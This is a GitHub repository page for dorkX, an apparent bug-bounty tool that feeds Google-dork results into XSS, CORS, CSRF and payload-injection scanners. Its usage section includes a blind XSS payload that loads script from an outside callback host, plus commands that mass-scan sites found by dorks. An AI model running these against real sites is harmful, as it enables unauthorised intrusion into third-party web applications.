Skip to content

ethicalhackingplayground/dorkX

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

dorkX

Pipe different tools with google dork Scanner

Version 1.0

Image from Gyazo

Image from Gyazo

Install

zoid@MSI ~/dorkX> git clone https://github.com/ethicalhackingplayground/dorkX

zoid@MSI ~/dorkX> cd dorkX

zoid@MSI ~/dorkX> go build dorkx.go

zoid@MSI ~/dorkX> go build corsx.go

zoid@MSI ~/dorkX> go build csrfx.go

zoid@MSI ~/dorkX> go build zin.go

Usage:

Blind XSS

zoid@MSI ~/dorkX> ./dorkX -dorks dorks.txt -concurrency 100 | dalfox pipe -b '"><script src=https://z0id.xss.ht></script>'

Image from Gyazo

XSS

zoid@MSI ~/dorkX> ./dorkx -dorks dorks.txt | dalfox pipe

zoid@MSI ~/dorkX> ./dorkx -dork "inurl:index.php?id" | dalfox pipe

Cors

zoid@MSI ~/dorkX> ./dorkx -dorks dorks.txt | ./corsx

zoid@MSI ~/dorkX> ./dorkx -dork "inurl:index.php?id" | ./corsx

CSRF

zoid@MSI ~/dorkX> ./dorkx -dorks dorks.txt | ./csrfx

zoid@MSI ~/dorkX> ./dorkx -dork "inurl:index.php?id" | ./csrfx

Payload Injection

zoid@MSI ~/dorkX> ./dorkx -dorks dorks.txt | ./zin -pL <payloadList>

zoid@MSI ~/dorkX> ./dorkx -dork "inurl:index.php?id" |./zin -p <payload>

If you get a bounty please support by buying me a coffee

Buy Me A Coffee

About

Pipe different tools with google dork Scanner

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages